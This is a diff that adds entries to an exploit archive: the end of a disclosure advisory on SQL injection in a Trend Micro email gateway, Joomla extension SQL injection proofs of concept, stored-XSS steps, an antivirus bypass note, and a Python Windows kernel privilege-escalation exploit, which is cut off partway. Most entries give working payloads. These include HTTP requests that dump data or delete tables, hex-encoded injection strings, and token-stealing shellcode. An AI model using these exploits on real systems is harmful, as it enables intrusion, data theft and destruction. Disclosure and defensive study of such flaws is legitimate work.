+Don't decrypt messages to
+
+-----/
+
+7.11. *SQL injection in policies.jsp*
+
+[CVE-2018-6228]
+The hidEditId parameter of the policies.jsp script is not sanitized,
+leading to SQL injection.
+
+As can be seen in the following excerpt, the script reads a parameter
+named hidEditId and forwards it to the editPolicy.jsp script if it is
+not set to -1.
+
+From webapps/ROOT/policies.jsp:
+
+/-----
+<% if (request.getParameter("hidEditId") != null)
+ if (request.getParameter("hidEditId").compareTo("-1") != 0)
+ {
+ String hid_edit_id = request.getParameter("hidEditId");
+ %>"/><%
+ }
+[...]
+-----/
+
+The editPolicy.jsp script will pass this parameter without any
+modification to the loadRuleDetails method, which is defined in the
+formEditPolicy class
+
+From webapps/ROOT/editPolicy.jsp:
+
+/-----
+if (request.getParameter("editRuleId") != null)
+frm.loadRuleDetails(request.getParameter("editRuleId"));
+[...]
+-----/
+
+Finally, the loadRuleDetails method will use the unsanitized parameter
+it receives to build a dynamic SQL statement as follows:
+
+From webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/formEditPolicy:
+
+/-----
+public boolean loadRuleDetails(String ruleId)
+{
+ _databaseError = false;
+
+
+ try
+ {
+ _ruleId = ruleId;
+ _ruleResultId = dataStore.getRuleResultId(ruleId);
+ _ruleForId = dataStore.getRuleForId(ruleId);
+ _ruleEmails = dataStore.getRuleAddreses(ruleId);
+ _ruleSubRules = dataStore.getSubRules(ruleId);
+ [...]
+
+public String getRuleResultId(String ruleId) throws SQLException
+{
+ Connection cnn = MySQLClient.GetInstance().GetConnection();
+ Statement query = cnn.createStatement();
+ String ruleResultId = "";
+
+ ResultSet rs = null;
+
+ try
+ {
+ rs = query.executeQuery("SELECT RuleResultId FROM RulesEngine
+WHERE Id = " + ruleId);
+ [...]
+-----/
+
+The contents of ruleId will be appended to the SELECT query, resulting
+in a SQL injection.
+
+The following PoC opens a policy to edit, even though the hidEditId
+parameter is invalid. Due to the "always true" comparison, the first
+element is retrieved:
+
+/-----
+POST /policies.jsp HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)
+Gecko/20100101 Firefox/53.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 84
+Referer: https://server/editPolicy.jsp
+Cookie: JSESSIONID=4CFE9B6E37DFABC16AF5D6F091F1A0E2
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+action=policies%3Apostback&hidSequence=&hidEditId=178275005%20or%201%3d1%20LIMIT%201
+-----/
+
+7.12. *SQL injection in editPolicy.jsp*
+
+[CVE-2018-6229]
+The hidRuleId parameter of the editPolicy.jsp script is not sanitized,
+leading to SQL injection in a DELETE statement.
+
+The following excerpt shows that the request object is forwarded to the
+DeletePolicy method implemented in the formEditPolicy class.
+
+From webapps/ROOT/editPolicy.jsp:
+
+/-----
+<% if (frm.isPostBack())
+{
+ if (request.getParameter("hidDelete").compareTo("YES") == 0)
+ {
+ frm.DeletePolicy(request);
+ }
+[...]
+-----/
+
+DeletePolicy reads the hidRuleId parameter and calls deletePolicy with
+it, without doing any sanitization.
+
+From webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/formEditPolicy:
+
+/-----
+public boolean DeletePolicy(HttpServletRequest request)
+{
+ String ruleId = request.getParameter("hidRuleId");
+ boolean success = dataStore.deletePolicy(ruleId);
+ _databaseError = (!success);
+
+ return success;
+}
+-----/
+
+Finally, the JPostgresDataHelper class uses the ruleId parameter to
+build dynamic SQL statements, as can be seen in the following extract.
+
+From webapps/ROOT/WEB-INF/classes/com/identum/pmg/data/JPostgresDataHelper:
+
+/-----
+public boolean deletePolicy(String ruleId)
+{
+ Connection cnn = null;
+ Statement query = null;
+
+ boolean bSuccess = true;
+
+ try
+ {
+ cnn = MySQLClient.GetInstance().GetConnection();
+ cnn.setAutoCommit(false);
+ query = cnn.createStatement();
+
+ query.executeUpdate("DELETE FROM RulesEmailIndex WHERE
+RulesEngineId = " + ruleId);
+ query.executeUpdate("DELETE FROM SubRuleIndex WHERE RulesEngineId
+= " + ruleId);
+ query.executeUpdate("DELETE FROM RulesEngine WHERE Id = " + ruleId);
+ [...]
+-----/
+
+The ruleId parameter will be appended as-is to the DELETE statements,
+resulting in a SQL injection.
+
+The following request will cause the RulesEmailIndex, SubRuleIndex, and
+RulesEngine tables to be truncated:
+
+/-----
+POST /editPolicy.jsp HTTP/1.1
+Host: [server]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0)
+Gecko/20100101 Firefox/53.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Referer: https://[server]/policies.jsp
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 133
+Cookie: JSESSIONID=2B363A12C93CA038322EE551890FF30F
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+action=editPolicy%3Apostback&hidEmails=&hidConditions=&hidRuleId=223+OR++'1+'%3d+'1+'&hidDelete=YES&ruleResult=3&ruleTarget=3&envId=1
+-----/
+
+
+7.13. *SQL Injection in emailSearch.jsp*
+
+[CVE-2018-6230]
+The SearchString parameter of the emailSearch.jsp script is not
+sanitized, leading to a SQL injection.
+
+As can be seen in the following excerpt, the emailSearch.jsp script
+reads a parameter named SearchString and calls the getResults method
+defined in the wsEmailSearch class.
+
+From webapps/ROOT/emailSearch.jsp:
+
+/-----
+if (session.getAttribute("UserName") != null)
+{
+ response.setContentType("text/xml");
+ ws.setSearchParam(request.getParameter("SearchString"));
+ java.util.Vector res = ws.getResults();
+ [...]
+-----/
+
+The searchParam property is not sanitized before being used to build a
+dynamic SQL query, resulting in a SQL injection in the SELECT statement.
+
+From webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/wsEmailSearch:
+
+/-----
+public class wsEmailSearch
+{
+ private String _searchParam = "";
+ public void setSearchParam(String searchParam) { _searchParam =
+searchParam; }
+
+ public Vector getResults()
+ {
+ Vector res = new Vector();
+
+ Connection cnn = MySQLClient.GetInstance().GetConnection();
+ try
+ {
+ Statement query = cnn.createStatement();
+
+ ResultSet rs = query.executeQuery("SELECT address FROM
+RulesEmailAddresses WHERE address LIKE '%" + _searchParam + "%' ORDER BY
+address");
+[...]
+-----/
+
+The following proof of concept will cause all the e-mails on the
+database to be retrieved:
+
+/-----
+POST /emailSearch.jsp HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)
+Gecko/20100101 Firefox/53.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Content-Type: application/x-www-form-urlencoded
+Referer: https://server/policies.jsp
+Content-Length: 39
+Cookie: JSESSIONID=4CFE9B6E37DFABC16AF5D6F091F1A0E2
+Connection: close
+
+SearchString=' OR '%1%'='%1
+-----/
+
+8. *Report Timeline*
+2017-06-05: Core Security sent an initial notification to Trend Micro,
+including a draft advisory.
+2017-06-05: Trend Micro confirmed reception of advisory and informed
+they will submit it to the relevant technical team for validation and
+replication.
+2017-06-22: Core Security asked for an update on the vulnerability
+reported.
+2017-06-22: Trend Micro answered saying the cases are still being vetted
+and that they will commit a time when the solution is finalized.
+2017-08-28: Core Security asked again for an update on the vulnerability
+reported.
+2017-08-28: Trend Micro answered saying the team is still in the process
+of creating the official fix for the vulnerabilities, although there is
+still no official release date.
+2017-10-02: Core Security asked again for an update on the vulnerability
+reported.
+2017-10-02: Trend Micro answered saying the team are still finalizing
+the fix to ensure all vulnerabilities are covered.
+2017-11-13: Core Security asked again (4th time) for an ETA for the
+official fix. We stated we need a release date or a thorough explanation
+on why after five months there is still no date defined. If there is no
+such answer we will be forced to publish the advisory.
+2017-11-14: Trend Micro answered saying the team is still working on two
+vulnerabilities and due to the complexity and number of vulnerabilities
+overall found, their team requires more time.
+2018-01-16: Core Security asked again (5th time) for an ETA for the
+official fix.
+2018-01-23: Trend Micro answered proposing the publication date to be
+February 7th.
+2018-01-24: Core Security thanked Trend Micro's answer and asked if all
+the vulnerabilities reported in the advisory will be addressed. In
+addition, Core Security asked for CVE-IDs.
+2018-01-24: Trend Micro confirmed all submitted vulnerabilities will be
+addressed and notified Core Security they will send the CVE-IDs when
+have these assigned. In addition, Trend Micro sent its new PGP key.
+2018-01-29: Core Security thanked Trend Micro's confirmation and agreed
+on the proposed release date.
+2018-01-29: Trend Micro answered saying the team found a couple of
+issues during the QA test. Consequently, Trend Micro asked for
+additional time to fix the remaining vulnerabilities and required a
+separated disclosure time.
+2018-01-29: Core Security answered its intention to report all the
+vulnerabilities in just one advisory and asked for a timeline for the fix.
+2018-02-01: Core Security asked for an update on the remaining
+vulnerabilities.
+2018-02-02: Trend Micro sent an update and requested a week extension.
+2018-02-02: Core Security thanked Trend Micro's update and agreed to
+postpone the release.
+2018-02-14: Trend Micro answered saying the remaining vulnerabilities
+will not be addressed in the patch due to its complexity; therefore,
+mitigation steeps will be recommending. Also, Trend Micro proposed
+February 21 as the release date.
+2018-02-14: Core Security thanked Trend Micro's update and agreed on the
+proposed release date.
+2018-02-21: Advisory CORE-2017-0006 published.
+
+9. *References*
+
+[1]
+http://apac.trendmicro.com/apac/enterprise/network-web-messaging-security/email-encryption/
+
+
+10. *About CoreLabs*
+
+CoreLabs, the research center of Core Security, is charged with
+anticipating the future needs and requirements for information security
+technologies.
+We conduct our research in several important areas of computer security
+including system vulnerabilities, cyber attack planning and simulation,
+source code auditing, and cryptography. Our results include problem
+formalization, identification of vulnerabilities, novel solutions and
+prototypes for new technologies. CoreLabs regularly publishes security
+advisories, technical papers, project information and shared software
+tools for public use at:
+http://corelabs.coresecurity.com.
+
+11. *About Core Security*
+
+Core Security provides companies with the security insight they need to
+know who, how, and what is vulnerable in their organization. The
+company's threat-aware, identity & access, network security, and
+vulnerability management solutions provide actionable insight and context
+needed to manage security risks across the enterprise. This shared
+insight gives customers a comprehensive view of their security posture
+to make better security remediation decisions. Better insight allows
+organizations to prioritize their efforts to protect critical assets,
+take action sooner to mitigate access risk, and react faster if a breach
+does occur.
+
+Core Security is headquartered in the USA with offices and operations in
+South America, Europe, Middle East and Asia. To learn more, contact Core
+Security at (678) 304-4500 or info@coresecurity.com
+
+12. *Disclaimer*
+
+The contents of this advisory are copyright (c) 2018 Core Security and
+(c) 2018 CoreLabs,and are licensed under a Creative Commons Attribution
+Non-Commercial Share-Alike 3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/
+
+13. *PGP/GPG Keys*
+
+This advisory has been signed with the GPG key of Core Security advisories
+team, which is available for download at
+http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
\ No newline at end of file
diff --git a/exploits/php/webapps/44158.txt b/exploits/php/webapps/44158.txt
new file mode 100644
index 000000000..a4130b145
--- /dev/null
+++ b/exploits/php/webapps/44158.txt
@@ -0,0 +1,24 @@
+# # # #
+# Exploit Title: Joomla! Component CW Tags 2.0.6 - SQL Injection
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: http://www.cwjoomla.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/search-a-indexing/tags-a-clouds/cw-tags/
+# Version: 2.0.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7313
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/index.php?option=com_cwtags&searchtext[]=[SQL]
+#
+# %2d%45%66%65%27%29%20%20%2f%2a%21%30%33%33%33%33%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%33%33%33%33%53%45%4c%45%43%54%2a%2f%20%40%40%48%4f%53%54%4e%41%4d%45%2d%2d%20%2d
+#
+# %31%27%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%64%61%74%61%62%61%73%65%28%29%20%61%73%20%63%68%61%72%29%2c%30%78%37%65%29%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%64%61%74%61%62%61%73%65%28%29%20%6c%69%6d%69%74%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%67%72%6f%75%70%20%62%79%20%78%29%61%29%20%41%4e%44%20%27%27%3d%27
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44159.txt b/exploits/php/webapps/44159.txt
new file mode 100644
index 000000000..efce187c8
--- /dev/null
+++ b/exploits/php/webapps/44159.txt
@@ -0,0 +1,23 @@
+# # # #
+# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: https://www.christianwebministries.org/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/
+# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip
+# Version: 9.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7317
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/media/com_biblestudy/backup/
+#
+# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44160.txt b/exploits/php/webapps/44160.txt
new file mode 100644
index 000000000..fab47ce3c
--- /dev/null
+++ b/exploits/php/webapps/44160.txt
@@ -0,0 +1,24 @@
+# # # #
+# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: http://www.mlwebtechnologies.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/
+# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/
+# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip
+# Version: 3.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7314
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]
+#
+# %31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44161.txt b/exploits/php/webapps/44161.txt
new file mode 100644
index 000000000..83fb4ede2
--- /dev/null
+++ b/exploits/php/webapps/44161.txt
@@ -0,0 +1,29 @@
+# # # #
+# Exploit Title: Joomla! Component Ek Rishta 2.9 - SQL Injection
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/
+# Version: 2.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7315
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/index.php/component/ekrishta/alluser?options=com_ekrishta&view=alluser
+# &gender=[SQL]
+# &age1=[SQL]
+# &age2=[SQL]
+# &religion=[SQL]
+# &mothertounge=[SQL]
+# &caste=[SQL]
+# &country=[SQL]
+#
+# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44162.txt b/exploits/php/webapps/44162.txt
new file mode 100644
index 000000000..c74d14c43
--- /dev/null
+++ b/exploits/php/webapps/44162.txt
@@ -0,0 +1,23 @@
+# # # #
+# Exploit Title: Joomla! Component Alexandria Book Library 3.1.2 - SQL Injection
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: https://alexandriabooklibrary.org/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/alexandria-book-library/
+# Software Download: https://alexandriabooklibrary.org/abook_files/Alexandria_Book_Library/Alexandria_Book_Library_for_Joomla_30/Component/com_abook_3_1_2_beta.tgz
+# Version: 3.1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7312
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/index.php?option=com_abook&view=category&letter=[SQL]
+#
+# %44%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44163.txt b/exploits/php/webapps/44163.txt
new file mode 100644
index 000000000..307d78fda
--- /dev/null
+++ b/exploits/php/webapps/44163.txt
@@ -0,0 +1,27 @@
+# # # #
+# Exploit Title: Joomla! Component CheckList 1.1.1 - SQL Injection
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: https://www.joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7318
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/index.php?option=com_checklist&view=frontend
+# &title_search=[SQL]
+# &tag_search=[SQL]
+# &name_search=[SQL]
+# &description_search=[SQL]
+# &filter_order=[SQL]
+#
+# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44164.txt b/exploits/php/webapps/44164.txt
new file mode 100644
index 000000000..468a5b097
--- /dev/null
+++ b/exploits/php/webapps/44164.txt
@@ -0,0 +1,23 @@
+# # # #
+# Exploit Title: Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: https://www.christianwebministries.org/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/
+# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip
+# Version: 9.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7316
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
+#
+# http://localhost/[PATH]/images/biblestudy/media/[FILE]
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44165.txt b/exploits/php/webapps/44165.txt
new file mode 100644
index 000000000..f7df14d68
--- /dev/null
+++ b/exploits/php/webapps/44165.txt
@@ -0,0 +1,23 @@
+# # # #
+# Exploit Title: Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection
+# Dork: N/A
+# Date: 22.02.2018
+# Vendor Homepage: https://www.joomdonation.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property/
+# Version: 3.12.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7319
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+#
+# POC:
+#
+# 1)
+# http://localhost/[PATH]/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch
+# &cooling_system1=[SQL]
+# &heating_system1=[SQL]
+# &laundry=[SQL]
+#
+# # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/44170.txt b/exploits/php/webapps/44170.txt
new file mode 100644
index 000000000..52e1240f7
--- /dev/null
+++ b/exploits/php/webapps/44170.txt
@@ -0,0 +1,19 @@
+#######################################################
+# Exploit Title: Learning and Examination Management System Script 2.3.1 – Stored XSS
+# Date: 09.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/learning-examination-management-system/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 2.3.1
+# Tested on: Linux Mint
+# CVE: CVE-2018-6866
+#######################################################
+
+Proof of Concept
+-----------------
+1. Login into the site
+2. Goto “Message” options
+3. Put as message / reply message
+4. You will be having a popup “PKP”
\ No newline at end of file
diff --git a/exploits/php/webapps/44171.txt b/exploits/php/webapps/44171.txt
new file mode 100644
index 000000000..93c2bf635
--- /dev/null
+++ b/exploits/php/webapps/44171.txt
@@ -0,0 +1,19 @@
+#######################################################
+# Exploit Title: Alibaba Clone Script 1.0.2 – Stored XSS
+# Date: 09.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/alibaba-clone/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6867
+#######################################################
+
+Proof of Concept
+-----------------
+1. Login into the site
+2. Goto “Edit Profile”
+3. Put in any field
+4. You will be having a popup “PKP”
\ No newline at end of file
diff --git a/exploits/php/webapps/44172.txt b/exploits/php/webapps/44172.txt
new file mode 100644
index 000000000..d4f4fead5
--- /dev/null
+++ b/exploits/php/webapps/44172.txt
@@ -0,0 +1,19 @@
+########################################################################
+# Exploit Title: Slickdeals/DealNews/Groupon Clone Script 3.0.2 – Stored XSS
+# Date: 09.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 3.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6868
+##########################################################################
+
+Proof of Concept
+------------------------
+1. Login into the site
+2. Goto “Edit Profile”
+3. Put in any field
+4. You will be having a popup “PKP”
\ No newline at end of file
diff --git a/exploits/windows/local/44169.txt b/exploits/windows/local/44169.txt
new file mode 100644
index 000000000..cd044cd9b
--- /dev/null
+++ b/exploits/windows/local/44169.txt
@@ -0,0 +1,49 @@
+/*
+Title: Armadito Antivirus - Malware Detection Bypass
+Date: 21/02/2018
+Author: Souhail Hammou
+Author's website: http://rce4fun.blogspot.com
+Vendor Homepage: http://www.teclib-edition.com/en/
+Version: 0.12.7.2
+CVE: CVE-2018-7289
+
+
+Details:
+--------
+An issue was discovered in armadito-windows-driver/src/communication.c affecting Armadito 0.12.7.2 and previous versions.
+Malware with filenames containing pure UTF-16 characters can bypass detection.
+The user-mode service will fail to open the file for scanning after the conversion is done from Unicode to ANSI.
+This happens because characters that cannot be converted from Unicode are replaced with the '?' character.
+
+The code responsible for this issue is located in armadito-windows-driver/src/communication.c
+
+========================================================================================================
+ // Convert unicode string to ansi string for ring 3 process.
+ ntStatus = RtlUnicodeStringToAnsiString(&AnsiString, (PCUNICODE_STRING)FilePath, TRUE);
+ if(!NT_SUCCESS(ntStatus)){
+ DbgPrint("[-] Error :: ArmaditoGuard!SendScanOrder :: RtlUnicodeStringToAnsiString() routine failed !! \n");
+ __leave;
+ }
+========================================================================================================
+
+The two examples below demonstrate the bug.
+In the first case, the filename is in Arabic and in the second, the filename's first letter is the greek M (U+039C).
+
+
+Original filename:
+ مرحبا.exe : 0645 0631 062d 0628 0627 002e 0065 0078 0065
+
+Converted to ANSI by Armadito:
+ ?????.exe : 3f 3f 3f 3f 3f 2e 65 78 65
+
+=============================
+
+Original filename:
+ Μalware.exe : 039c 0061 006c 0077 0061 0072 0065 002e 0065 0078 0065
+
+Converted to ANSI by Armadito:
+ ?alware.exe : 3f 61 6c 77 61 72 65 2e 65 78 65
+
+
+See: https://github.com/armadito/armadito-windows-driver/issues/5
+*/
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/44168.py b/exploits/windows_x86-64/local/44168.py
new file mode 100755
index 000000000..a47cb11ce
--- /dev/null
+++ b/exploits/windows_x86-64/local/44168.py
@@ -0,0 +1,451 @@
+from ctypes import *
+
+from ctypes.wintypes import *
+
+import struct
+
+import sys
+
+import os
+
+
+
+MEM_COMMIT = 0x00001000
+
+MEM_RESERVE = 0x00002000
+
+PAGE_EXECUTE_READWRITE = 0x00000040
+
+GENERIC_READ = 0x80000000
+
+GENERIC_WRITE = 0x40000000
+
+OPEN_EXISTING = 0x3
+
+STATUS_INVALID_HANDLE = 0xC0000008
+
+
+
+shellcode_len = 90
+
+s = “”
+
+s += “\x65\x48\x8B\x04\x25\x88\x01\x00” #mov rax, [gs:0x188]
+
+s += “\x00”
+
+s += “\x48\x8B\x40\x70” #mov rax, [rax + 0x70]
+
+s += “\x48\x8B\x98\x90\x02\x00\x00” #mov rbx, [rax + 0x290]
+
+s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188]
+
+s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188
+
+s += “\x48\x39\x98\x80\x01\x00\x00” #cmp [rax + 0x180], rbx
+
+s += “\x75\xEA” #jne Loop1
+
+s += “\x48\x89\xC1” #mov rcx, rax
+
+s += “\xBA\x04\x00\x00\x00” #mov rdx, 0x4
+
+s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188]
+
+s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188
+
+s += “\x48\x39\x90\x80\x01\x00\x00” #cmp [rax + 0x180], rdx
+
+s += “\x75\xEA” #jne Loop2
+
+s += “\x48\x8B\x80\x08\x02\x00\x00” #mov rax, [rax + 0x208]
+
+s += “\x48\x89\x81\x08\x02\x00\x00” #mov [rcx + 0x208], rax
+
+s += “\x48\x31\xC0” #xor rax,rax
+
+s += “\xc3” #ret
+
+shellcode = s
+
+
+
+
+
+”’
+
+* Convert a python string to PCHAR
+
+@Param string – the string to be converted.
+
+@Return – a PCHAR that can be used by winapi functions.
+
+”’
+
+def str_to_pchar(string):
+
+ pString = c_char_p(string)
+
+
+
+ return pString
+
+
+
+”’
+
+* Map memory in userspace using NtAllocateVirtualMemory
+
+@Param address – The address to be mapped, such as 0x41414141.
+
+@Param size – the size of the mapping.
+
+@Return – a tuple containing the base address of the mapping and the size returned.
+
+”’
+
+def map_memory(address, size):
+
+ temp_address = c_void_p(address)
+
+ size = c_uint(size)
+
+
+
+ proc = windll.kernel32.GetCurrentProcess()
+
+ nt_status = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc),
+
+ byref(temp_address), 0,
+
+ byref(size),
+
+ MEM_RESERVE|MEM_COMMIT,
+
+ PAGE_EXECUTE_READWRITE)
+
+
+
+ #The mapping failed, let the calling code know
+
+ if nt_status != 0:
+
+ return (-1, c_ulong(nt_status).value)
+
+ else:
+
+ return (temp_address, size)
+
+
+
+”’
+
+* Write to some mapped memory.
+
+@Param address – The address in memory to write to.
+
+@Param size – The size of the write.
+
+@Param buffer – A python buffer that holds the contents to write.
+
+@Return – the number of bytes written.
+
+”’
+
+def write_memory(address, size, buffer):
+
+ temp_address = c_void_p(address)
+
+ temp_buffer = str_to_pchar(buffer)
+
+ proc = c_void_p(windll.kernel32.GetCurrentProcess())
+
+ bytes_ret = c_ulong()
+
+ size = c_uint(size)
+
+
+
+ windll.kernel32.WriteProcessMemory(proc,
+
+ temp_address,
+
+ temp_buffer,
+
+ size,
+
+ byref(bytes_ret))
+
+
+
+ return bytes_ret
+
+
+
+”’
+
